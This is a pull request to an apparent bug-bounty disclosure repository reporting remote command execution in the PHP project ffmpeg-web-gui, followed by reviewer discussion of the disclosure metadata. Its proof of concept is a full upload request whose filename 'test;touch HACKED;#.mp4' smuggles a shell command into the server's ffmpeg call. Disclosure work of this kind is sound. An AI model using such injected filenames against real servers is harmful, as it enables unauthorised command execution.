### PR TITLE
RCE on "ffmpeg-web-ui"

### PR DESCRIPTION
**Pull request by Mik317**
## ✍️ Description

The `ffmpeg-web-ui` project is a `video converter` which uses the `ffmpeg` command line tool to `convert` various video formats in `html`. The project however `concatenates` commands with `user-supplied` inputs, leading to `RCE` on the server hosting the web gui.

## 🕵️‍♂️ Proof of Concept

Sample request:

```http
POST /ffmpeg_web_gui/upload-and-convert.php HTTP/1.1
Host: localtest.me
Content-Length: 1571624
Cache-Control: max-age=0
Origin: http://localtest.me
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMFH7A2ecHBQQMhZu
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localtest.me/ffmpeg_web_gui/upload-and-convert.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,it;q=0.8,ru;q=0.7
Connection: close
------WebKitFormBoundaryMFH7A2ecHBQQMhZu
Content-Disposition: form-data; name="file"; filename="test;touch HACKED;#.mp4"
Content-Type: video/mp4
<video_data_binary>
------WebKitFormBoundaryMFH7A2ecHBQQMhZu
Content-Disposition: form-data; name="video_size"
560x304
------WebKitFormBoundaryMFH7A2ecHBQQMhZu
Content-Disposition: form-data; name="video_bitrate"
700
------WebKitFormBoundaryMFH7A2ecHBQQMhZu
Content-Disposition: form-data; name="video_framerate"
30
------WebKitFormBoundaryMFH7A2ecHBQQMhZu
Content-Disposition: form-data; name="encoding_video_deinterlace"
on
------WebKitFormBoundaryMFH7A2ecHBQQMhZu
Content-Disposition: form-data; name="encoding_enable_audio"
on
------WebKitFormBoundaryMFH7A2ecHBQQMhZu
Content-Disposition: form-data; name="encoding_audio_sampling_rate"
44100
------WebKitFormBoundaryMFH7A2ecHBQQMhZu
Content-Disposition: form-data; name="encoding_audio_bitrate"
128
------WebKitFormBoundaryMFH7A2ecHBQQMhZu
Content-Disposition: form-data; name="encoding_audio_channels"
stereo
------WebKitFormBoundaryMFH7A2ecHBQQMhZu
Content-Disposition: form-data; name="encoding_x264"
on
------WebKitFormBoundaryMFH7A2ecHBQQMhZu
Content-Disposition: form-data; name="encoding_ogv"
on
------WebKitFormBoundaryMFH7A2ecHBQQMhZu
Content-Disposition: form-data; name="encoding_webm"
on
------WebKitFormBoundaryMFH7A2ecHBQQMhZu
Content-Disposition: form-data; name="encoding_stills"
on
------WebKitFormBoundaryMFH7A2ecHBQQMhZu
Content-Disposition: form-data; name="submit"
Upload and convert
------WebKitFormBoundaryMFH7A2ecHBQQMhZu--
```

Video POC: https://vimeo.com/user106572974/review/441849060/84a2f8937b (pass: `testpoc`)

## 💥 Impact

`RCE/arbitrary command execution` on the `server` hosting the web gui.

## ☎️ Contact

-

## ✅ Checklist

**In my pull request, I have:**

- [x] _Created and populated the `README.md` and `vulnerability.json` files_
- [x] _Provided the repository URL and any applicable [permalinks]([https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files](https://help.github.com/en/github/managing-files-in-a-repository/getting-permanent-links-to-files))_
- [x] _Defined all the applicable weaknesses ([CWEs]([https://cwe.mitre.org/](https://cwe.mitre.org/)))_
- [x] _Proposed the CVSS vector items i.e. User Interaction, Attack Complexity_
- [x] _Checked that the vulnerability affects the latest version of the package released_
- [x] _Checked that a fix does not currently exist that remediates this vulnerability_
- [x] _Complied with all applicable laws_

### CODE REVIEW

**Comment by Mik317** [comment]
I'm not able to understand why it continues to fail the checks ...
@adam-nygate could you kindly check what should I change?

Thanks a lot :smile:,
Mik

**Comment by JamieSlome** [comment]
@Mik317 - we currently have a bug that is failing the disclosures, even in the instance of the JSON being valid. We will resolve this bug ASAP.

Cheers! 🍰

**Comment by JamieSlome** [comment]
@Mik317 - LGTM! 🍰 

Awaiting final review from @toufik-airane!

Cheers!

File: bounties/packagist/ffmpeg-web-gui/1/vulnerability.json [hunk 1]
```diff
@@ -0,0 +1,48 @@
...
+  "CVEs": [],
+  "Repository": {
+    "URL": "https://github.com/swooningfish/ffmpeg-web-gui",
+    "Codebase": [
+      "PHP"
+    ]
+  },
+  "Permalinks": [
+    "https://github.com/swooningfish/ffmpeg-web-gui/blob/master/upload-and-convert.php#L176",
+    "https://github.com/swooningfish/ffmpeg-web-gui/blob/master/upload-and-convert.php#L180"
```
Comment (toufik-airane) [inline bounties/packagist/ffmpeg-web-gui/1/vulnerability.json:45]: I think it's important to highlight the sink and the source.
```
"https://github.com/swooningfish/ffmpeg-web-gui/blob/master/upload-and-convert.php#L176",
"https://github.com/swooningfish/ffmpeg-web-gui/blob/master/upload-and-convert.php#L180",
"https://github.com/swooningfish/ffmpeg-web-gui/blob/master/upload-and-convert.php#L181",
"https://github.com/swooningfish/ffmpeg-web-gui/blob/master/upload-and-convert.php#L192",
"https://github.com/swooningfish/ffmpeg-web-gui/blob/master/upload-and-convert.php#L207",
"https://github.com/swooningfish/ffmpeg-web-gui/blob/master/upload-and-convert.php#L217",
"https://github.com/swooningfish/ffmpeg-web-gui/blob/master/upload-and-convert.php#L227"
```

File: bounties/packagist/ffmpeg-web-gui/1/vulnerability.json [hunk 2]
```diff
@@ -0,0 +1,48 @@
...
+  },
+  "Package": {
+    "Registry": "packagist",
+    "Name": "ffmpeg-web-gui",
+    "URL": "https://github.com/swooningfish/ffmpeg-web-gui"
+  },
+  "CWEs": [
+    {
+      "ID": "78",
+      "Description": "Arbitrary Command Injection"
```
Comment (toufik-airane) [inline bounties/packagist/ffmpeg-web-gui/1/vulnerability.json:18]: I think we should add more content to the description, especially for new [huntr.dev](https://huntr.dev) users.

_As a sample:_
Arbitrary Command Injection due to negligent use of `exec()` functions.

**Comment by Mik317** [comment]
I updated as suggested @toufik-airane  :smile:

Regards,
Mik

**Comment by JamieSlome** [comment]
@Mik317 - you have two disclosures included in this pull request. This is fine, but it looks like you have also opened the detailed pull request from another branch as well.

Could you remove the second disclosure from this pull request?

**Comment by Mik317** [comment]
Hi @JamieSlome :smile:
thanks for letting me know about it. I deleted the 2 files regarding the second disclosure from the PR in order to leave on this PR only the files regarding the `ffmpeg-web-ui` disclosure.

Cheers,
Mik

**Pull request merged**